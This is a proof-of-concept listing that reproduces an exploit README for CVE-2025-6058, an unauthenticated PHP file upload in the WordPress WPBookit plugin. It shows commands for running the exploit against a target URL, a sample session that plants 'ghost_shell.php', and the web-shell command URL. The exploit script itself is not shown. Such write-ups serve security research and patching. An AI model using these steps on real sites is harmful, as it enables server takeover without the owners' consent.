CVE-2025-6058 PoC — WPBookit <= 1.0.4 - Unauthenticated Arbitrary File Upload

Source

Associated Vulnerability

Description

WordPress WPBookit ≤ 1.0.4 Unauthenticated File Upload Exploit

Readme

<p align="center">
  <img src="https://s.w.org/style/images/about/WordPress-logotype-alternative.png" alt="WordPress Logo" width="200">
</p>

<h1 align="center">🚨 CVE-2025-6058 — WordPress WPBookit ≤ 1.0.4 Unauthenticated File Upload Exploit</h1>

<p align="center">
  <img src="https://img.shields.io/badge/Exploit-Type-File%20Upload-red?style=flat-square">
  <img src="https://img.shields.io/badge/Platform-WordPress-blue?style=flat-square">
  <img src="https://img.shields.io/badge/Status-Working-brightgreen?style=flat-square">
  <img src="https://img.shields.io/github/license/0xgh057r3c0n/CVE-2025-6058?style=flat-square">
</p>

<p align="center">
  <b>Unauthenticated Arbitrary File Upload Exploit targeting WordPress WPBookit Plugin (≤ 1.0.4)</b><br>
  Exploit allows remote shell upload and full command execution.<br><br>
  <a href="https://github.com/0xgh057r3c0n">Author: 0xgh057r3c0n</a>
</p>

---

## 📌 About The Vulnerability

**CVE-2025-6058** is a critical vulnerability affecting the **WPBookit** plugin on WordPress CMS. An unauthenticated attacker can abuse a vulnerable AJAX endpoint to upload arbitrary PHP files, enabling **Remote Code Execution (RCE)**.

- 🎯 **Target**: WordPress CMS (vulnerable WPBookit plugin)
- 📦 **Plugin Affected**: WPBookit ≤ 1.0.4
- ⚠️ **Risk Level**: Critical (Unauthenticated RCE)

---

## ✨ Features

- 🔍 Auto-detects WordPress plugin version via `README.txt`
- 📤 Uploads lightweight PHP shell (`ghost_shell.php`)
- 🖥️ Interactive shell (Parrot-style prompt)
- 🌐 Unauthenticated — No login required
- 🎨 Colorized CLI Output

---

## 🚀 Usage Guide

### 💻 Requirements

```bash
python3 --version
pip install requests
````

---

### ⚙️ Exploit Execution

```bash
git clone https://github.com/0xgh057r3c0n/CVE-2025-6058.git
cd CVE-2025-6058
python3 CVE-2025-6058.py -u https://target-wordpress-site.com
```

---

## 🛠️ Example Shell Session

```bash
python3 CVE-2025-6058.py -u https://victim.com

[>] Checking plugin version...
[+] Found plugin version: 1.0.4
[!] Target version is vulnerable.

[>] Uploading shell...
[+] Upload successful.
[+] Shell URL: https://victim.com/wp-content/uploads/2025/07/ghost_shell.php?cmd=whoami

[!] Interactive GhostShell Started — type 'exit' to quit.

┌─[gaurav@0xgh057r3c0n]─[/var/www/html]
└──╼ $ whoami
www-data
```

---

## 📂 Shell Details

* **File Name**: `ghost_shell.php`
* **Path**: `/wp-content/uploads/YYYY/MM/ghost_shell.php`
* **Example**:

```
https://target-wordpress-site.com/wp-content/uploads/2025/07/ghost_shell.php?cmd=whoami
```

---

## ⚠️ Legal Disclaimer

> This exploit is developed for **educational purposes** and authorized penetration testing only. Unauthorized use against systems without explicit consent is **illegal**.

---

## 📄 License

Released under [MIT License](LICENSE)

---

<p align="center">
  Made for WordPress security auditing 🛡️ by <a href="https://github.com/0xgh057r3c0n">0xgh057r3c0n</a>
</p>

File Snapshot

 [4.0K]  /data/pocs/f367256ec76fc351e20072d059ff2136a7cb4ae0
├── [6.4K]  CVE-2025-6058.py
├── [3.2K]  CVE-2025-6058.yaml
├── [1.1K]  LICENSE
└── [3.0K]  README.md

1 directory, 4 files

Remarks